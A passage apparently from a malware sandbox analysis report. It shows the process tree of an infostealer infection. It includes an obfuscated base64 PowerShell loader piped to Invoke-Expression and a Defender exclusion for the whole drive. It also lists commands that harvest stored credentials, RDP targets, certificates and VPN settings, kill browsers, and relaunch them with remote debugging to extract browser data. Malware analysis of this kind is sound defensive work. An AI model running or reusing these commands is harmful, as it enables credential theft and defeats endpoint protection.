Lkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
        8⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops startup file
        System Location Discovery: System Language Discovery
        Suspicious behavior: AddClipboardFormatListener
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2988
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'
        9⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2900
      - C:\Users\Admin\AppData\Local\Temp\10411030101\captcha.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10411030101\captcha.exe"
        6⤵
        Executes dropped EXE
        Enumerates connected drives
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:6028
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c "dxdiag /t > \"C:\Users\Admin\AppData\Local\Temp\dxdiag_temp_3429073751.txt\""
        7⤵
        NTFS ADS
        
        PID:5704
        
        C:\Windows\system32\net.exe
        
        "net" statistics workstation
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:5792
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 statistics workstation
        8⤵
        
        PID:968
        
        C:\Windows\system32\vaultcmd.exe
        
        "vaultcmd" /list
        7⤵
        
        PID:3592
        
        C:\Windows\system32\tasklist.exe
        
        "tasklist"
        7⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4896
        
        C:\Windows\system32\tasklist.exe
        
        "tasklist"
        7⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2400
        
        C:\Windows\system32\tasklist.exe
        
        "tasklist" /FO CSV /NH
        7⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:6128
        
        C:\Windows\system32\tasklist.exe
        
        "tasklist"
        7⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2352
        
        C:\Windows\system32\cmdkey.exe
        
        "cmdkey" /list
        7⤵
        
        PID:4608
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command " $entries = cmdkey /list | Select-String \"TERMSRV\" -Context 0,3 foreach ($entry in $entries) { $target = ($entry -split \"target=\")[1].Trim() $ip = $target -replace \"TERMSRV/\", \"\" $userLine = $entry.Context.PostContext | Select-String \"User\" $user = if ($userLine) { ($userLine -split \":\")[1].Trim() } else { \"N/A\" } Write-Output \"Server: $ip | Username: $user\" } "
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5856
        
        C:\Windows\system32\cmdkey.exe
        
        "C:\Windows\system32\cmdkey.exe" /list
        8⤵
        
        PID:1808
        
        C:\Windows\system32\tasklist.exe
        
        "tasklist"
        7⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:3220
        
        C:\Windows\system32\tasklist.exe
        
        "tasklist"
        7⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:3768
        
        C:\Windows\system32\certutil.exe
        
        "certutil" -store My
        7⤵
        
        PID:3544
        
        C:\Windows\system32\certutil.exe
        
        "certutil" -store -user My
        7⤵
        
        PID:1032
        
        C:\Windows\system32\tasklist.exe
        
        "tasklist"
        7⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2356
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command "Get-VpnConnection | ConvertTo-Json"
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:220
        
        C:\Windows\system32\tasklist.exe
        
        "tasklist"
        7⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:5440
        
        C:\Windows\system32\tasklist.exe
        
        "tasklist"
        7⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:1216
        
        C:\Windows\system32\tasklist.exe
        
        "tasklist"
        7⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:1896
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command " $regPath = \"HKCU:\Software\Microsoft\Terminal Server Client\Servers\" if (Test-Path $regPath) { Get-ChildItem $regPath | ForEach-Object { $server = $_.PSChildName $usernamePath = Join-Path $_.PSPath \"UsernameHint\" $username = if (Test-Path $usernamePath) { (Get-ItemProperty -Path $usernamePath -Name \"(default)\" -ErrorAction SilentlyContinue).\"(default)\" } else { \"\" } Write-Output \"Server:$server,Username:$username\" } } "
        7⤵
        Command and Scripting Interpreter: PowerShell
        Hide Artifacts: Ignore Process Interrupts
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4272
        
        C:\Windows\system32\tasklist.exe
        
        "tasklist"
        7⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4828
        
        C:\Windows\system32\tasklist.exe
        
        "tasklist"
        7⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:5652
        
        C:\Windows\system32\cmdkey.exe
        
        "cmdkey" /list
        7⤵
        
        PID:4060
        
        C:\Windows\system32\cmdkey.exe
        
        "cmdkey" /list:TERMSRV/69.48.201.74
        7⤵
        
        PID:812
        
        C:\Windows\system32\tasklist.exe
        
        "tasklist"
        7⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:3544
        
        C:\Windows\system32\tasklist.exe
        
        "tasklist"
        7⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4292
        
        C:\Windows\system32\tasklist.exe
        
        "tasklist"
        7⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:3500
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM chrome.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2752
        
        C:\Windows\system32\tasklist.exe
        
        "tasklist"
        7⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:3948
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM msedge.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1376
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM brave.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5760
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:6072
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM chrome.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5816
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM opera.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1912
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:932
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM Discord.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5716
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:5276
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM vivaldi.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4940
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM DiscordCanary.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3216
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:3616
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM firefox.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2432
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM DiscordPTB.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3480
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM dragon.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1200
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM DiscordDevelopment.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2572
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM maxthon.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:396
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM uc_browser.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3564
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM slimjet.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1896
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM cent_browser.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5508
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM epic.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5028
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM torch.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:400
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM whale.exe
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4060
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM 360browser.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5532
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM qqbrowser.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3732
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM browser.exe
        7⤵
        Kills process with taskkill
        
        PID:5820
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM chrome.exe
        7⤵
        Kills process with taskkill
        
        PID:3232
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM msedge.exe
        7⤵
        Kills process with taskkill
        
        PID:944
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM brave.exe
        7⤵
        Kills process with taskkill
        
        PID:5904
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM opera.exe
        7⤵
        
        PID:4824
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM vivaldi.exe
        7⤵
        Kills process with taskkill
        
        PID:4888
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM firefox.exe
        7⤵
        Kills process with taskkill
        
        PID:4928
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM dragon.exe
        7⤵
        Kills process with taskkill
        
        PID:4804
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM maxthon.exe
        7⤵
        Kills process with taskkill
        
        PID:4864
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM uc_browser.exe
        7⤵
        Kills process with taskkill
        
        PID:3364
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM slimjet.exe
        7⤵
        Kills process with taskkill
        
        PID:312
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM cent_browser.exe
        7⤵
        Kills process with taskkill
        
        PID:4540
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM epic.exe
        7⤵
        Kills process with taskkill
        
        PID:4376
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM torch.exe
        7⤵
        Kills process with taskkill
        
        PID:4752
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM whale.exe
        7⤵
        Kills process with taskkill
        
        PID:2888
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM 360browser.exe
        7⤵
        Kills process with taskkill
        
        PID:1436
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM qqbrowser.exe
        7⤵
        Kills process with taskkill
        
        PID:396
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM browser.exe
        7⤵
        Kills process with taskkill
        
        PID:1996
        
        C:\Windows\system32\tasklist.exe
        
        "tasklist" /FI "IMAGENAME eq chrome.exe"
        7⤵
        Enumerates processes with tasklist
        
        PID:4404
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --headless=new --disable-extensions --disable-gpu --no-sandbox --disable-software-rasterizer --disable-dev-shm-usage --disable-background-networking --disable-default-apps --disable-translate --disable-sync --metrics-recording-only --mute-audio --no-first-run --no-default-browser-check --remote-debugging-port=46286 --remote-allow-origins=* "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory=Default
        7⤵
        Uses browser remote debugging
        Checks processor information in registry
        Enumerates system info in registry
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        
        PID:1960
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc62e4dcf8,0x7ffc62e4dd04,0x7ffc62e4dd10
        8⤵
        
        PID:4852
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --headless=new --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --gpu-preferences=UAAAAAAAAADgAQAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=disabled --field-trial-handle=2476,i,16354685821874023837,12045873099179892630,262144 --disable-features=PaintHolding --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2456 /prefetch:2
        8⤵
        Modifies registry class
        
        PID:4468
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2896,i,16354685821874023837,12045873099179892630,262144 --disable-features=PaintHolding --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2888 /prefetch:3
        8⤵
        
        PID:5760
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=3096,i,16354685821874023837,12045873099179892630,262144 --disable-features=PaintHolding --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3088 /prefetch:8
        8⤵
        
        PID:4688
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=46286 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3108,i,16354685821874023837,12045873099179892630,262144 --disable-features=PaintHolding --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2492 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:5004
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=46286 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3144,i,16354685821874023837,12045873099179892630,262144 --disable-features=PaintHolding --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=1652 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:1632
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --no-sandbox --remote-debugging-port=46286 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3972,i,16354685821874023837,12045873099179892630,262144 --disable-features=PaintHolding --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3968 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:4988
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=4504,i,16354685821874023837,12045873099179892630,262144 --disable-features=PaintHolding --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4500 /prefetch:8
        8⤵
        
        PID:2708
        
        C:\Windows\system32\tasklist.exe
        
        "tasklist" /FI "IMAGENAME eq chrome.exe"
        7⤵
        Enumerates processes with tasklist
        
        PID:4912
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM chrome.exe
        7⤵
        Kills process with taskkill
        
        PID:4080
        
        C:\Windows\system32\tasklist.exe
        
        "tasklist" /FI "IMAGENAME eq msedge.exe"
        7⤵
        Enumerates processes with tasklist
        
        PID:4824
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --headless=new --disable-extensions --disable-gpu --no-sandbox --disable-software-rasterizer --disable-dev-shm-usage --disable-background-networking --disable-default-apps --disable-translate --disable-sync --metrics-recording-only --mute-audio --no-first-run --no-default-browser-check --remote-debugging-port=47037 --remote-allow-origins=* "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --profile-directory=Default
        7⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious use of FindShellTrayWindow
        
        PID:4772
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x238,0x23c,0x240,0x234,0x24c,0x7ffc6345f208,0x7ffc6345f214,0x7ffc6345f220
        8⤵
        
        PID:620
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-sandbox --headless=new --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --gpu-preferences=UAAAAAAAAADgAQAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=disabled --always-read-main-dll --field-trial-handle=2520,i,3585056422909900231,7957304870864948959,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3000 /prefetch:2
        8⤵
        Modifies registry class
        
        PID:2744
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=3120,i,3585056422909900231,7957304870864948959,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3156 /prefetch:3
        8⤵
        
        PID:2888
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --mute-audio --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=3028,i,3585056422909900231,7957304870864948959,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3180 /prefetch:8
        8⤵
        
        PID:6072
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --pdf-upsell-enabled --no-sandbox --remote-debugging-port=47037 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=2736,i,3585056422909900231,7957304870864948959,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3192 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:4544
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --instant-process --pdf-upsell-enabled --no-sandbox --remote-debugging-port=47037 --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=2728,i,3585056422909900231,7957304870864948959,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3208 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:3764
        
        C:\Windows\system32\tasklist.exe
        
        "tasklist" /FI "IMAGENAME eq msedge.exe"
        7⤵
        Enumerates processes with tasklist
        
        PID:5680
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM msedge.exe
        7⤵
        
        PID:5496
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM chrome.exe
        7⤵
        Kills process with taskkill
        
        PID:2772
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM msedge.exe
        7⤵
        Kills process with taskkill
        
        PID:2476
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM brave.exe
        7⤵
        
        PID:1796
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM opera.exe
        7⤵
        Kills process with taskkill
        
        PID:3904
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM vivaldi.exe
        7⤵
        Kills process with taskkill
        
        PID:764
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM firefox.exe
        7⤵
        Kills process with taskkill
        
        PID:6132
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM dragon.exe
        7⤵
        Kills process with taskkill
        
        PID:4616
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM maxthon.exe
        7⤵
        Kills process with taskkill
        
        PID:312
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM uc_browser.exe
        7⤵
        Kills process with taskkill
        
        PID:1804
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM slimjet.exe
        7⤵
        Kills process with taskkill
        
        PID:4696
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM cent_browser.exe
        7⤵
        Kills process with taskkill
        
        PID:6096
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM epic.exe
        7⤵
        Kills process with taskkill
        
        PID:4376
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM torch.exe
        7⤵
        
        PID:656
        
        C:\Windows\system32\taskkill.exe
        
